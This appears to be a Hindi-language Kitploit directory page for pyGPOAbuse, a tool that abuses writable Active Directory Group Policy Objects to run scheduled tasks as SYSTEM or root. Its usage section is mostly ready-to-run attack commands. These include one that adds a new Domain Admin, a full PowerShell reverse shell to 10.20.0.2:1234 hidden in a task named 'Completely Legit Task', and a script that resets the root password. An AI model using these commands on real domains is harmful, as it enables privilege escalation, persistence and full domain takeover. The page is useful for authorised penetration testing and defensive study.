Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
pyGPOAbuse — SharpGPOAbuse का आंशिक पायथन कार्यान्वयन | Kitploit
उपकरण/GitHubGitHub/hackndo/pygpoabuse
विशेषाधिकार वृद्धिशोषणपार्श्व आंदोलनपोस्ट-शोषणपेनिट्रेशन टेस्टिंग
GitHubhackndo/pygpoabuse

pyGPOAbuse

SharpGPOAbuse का आंशिक पायथन कार्यान्वयन

रिपॉजिटरी देखें
5857112 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

pyGPOAbuse

D4RKMATT3R द्वारा फिल्टर जोड़

  • अस्वीकरण: इसका परीक्षण केवल एक स्थानीय AD वातावरण में संक्षिप्त रूप से किया गया था। मैं किसी भी अप्रत्याशित व्यवहार या खराबी के लिए कोई जिम्मेदारी नहीं लेता हूँ, यह जैसा है वैसा प्रदान किया गया है, केवल अधिकृत परीक्षण के लिए, पूरी तरह से आपके अपने जोखिम पर।
  • अब SharpGPOAbuse के समान उपयोगकर्ताओं या होस्टों के फ़िल्टर्ड लक्ष्यीकरण का समर्थन करता है।
  • परिदृश्य: GPO सक्रिय-निर्देशिका डोमेन से जुड़ा हुआ है, इसलिए कार्य उक्त डोमेन के भीतर सभी प्रभावित ऑब्जेक्ट्स (उपयोगकर्ता/होस्ट) पर लागू होंगे, जो बहुत अधिक अनावश्यक शोर और कलाकृतियों को छोड़ सकते हैं। इसलिए विशिष्ट लक्ष्यों (जैसे डोमेन कंट्रोलर) पर कमांड निष्पादित करने के लिए अधिक लक्षित दृष्टिकोण को प्राथमिकता दी जाती है।
root@kitploit:~
Host/User targeting via filters (mirrors SharpGPOAbuse --FilterEnabled):
  -filter-enabled       Enable GPO Host/User targeting so the scheduled task only runs for a specific host/user
  -target-dns-name FQDN
                        Computer task: DNS/FQDN of the only host that should run the task (e.g. dc01.corp.local)
  -target-username DOMAIN\USER
                        User task: only this user processes the task (format: DOMAIN\username)
  -target-user-sid SID  User task: SID of the targeted user (optional, more robust matching)

उदाहरण

root@kitploit:~
# Add Domain user and add to Domain Admins via Domain-Controller
python3 pygpoabuse.py red.local/user:Testing123 -gpo-id D9A65E7F-112D-49B9-AF7A-4FC2BA092BF6 -taskname SecurityUpdate  -dc-ip 192.168.152.2 -command 'net user UserGPO P@ssw0rd /add && net group "Domain Admins" UserGPO /add' -filter-enabled -target-dns-name dc01.red.local

विवरण

@pkb1s द्वारा SharpGPOAbuse का पायथन आंशिक कार्यान्वयन।

इस टूल का उपयोग तब किया जा सकता है जब एक नियंत्रित खाता किसी मौजूदा GPO को संशोधित कर सकता है जो एक या अधिक उपयोगकर्ताओं और कंप्यूटरों पर लागू होता है। यह कंप्यूटर GPO के लिए रिमोट कंप्यूटर पर SYSTEM के रूप में या उपयोगकर्ता GPO के लिए लॉग इन उपयोगकर्ता के रूप में एक तत्काल निर्धारित कार्य बनाएगा।

डिफ़ॉल्ट व्यवहार एक स्थानीय व्यवस्थापक जोड़ता है।

उदाहरण

उपयोग कैसे करें

मूल उपयोग

john उपयोगकर्ता को स्थानीय व्यवस्थापक समूह में जोड़ें (पासवर्ड: H4x00r123..)

root@kitploit:~
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"

उन्नत उपयोग

रिवर्स शेल उदाहरण

root@kitploit:~
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 
    -powershell \ 
    -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ 
    -taskname "Completely Legit Task" \
    -description "Dis is legit, pliz no delete" \ 
    -user

सफाई

निर्धारित कार्य को निष्पादित होने के बाद हटा दें।

root@kitploit:~
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" --cleanup

Samba AD उपयोग

यह टूल Samba AD डोमेन के साथ भी उपयोग किया जा सकता है। यह कंप्यूटर GPO के लिए रिमोट कंप्यूटर पर root के रूप में एक तत्काल कार्य बनाएगा।

पहले, एक Bash स्क्रिप्ट या ELF फ़ाइल बनाएँ।

root@kitploit:~
#!/bin/bash
echo "root:1234" | chpasswd

फिर --linux-exec तर्क के साथ टूल निष्पादित करें।

root@kitploit:~
./pygpoabuse.py DOMAIN/user:password -gpo-id "12345677-ABCD-9876-ABCD-123456789012" --linux-exec /path/to/executable

उदाहरण

श्रेय

  • @pkb1s for SharpGPOAbuse
  • @airman604 for schtask_now.py
  • @SkelSec for msldap
टूल डाउनलोड करें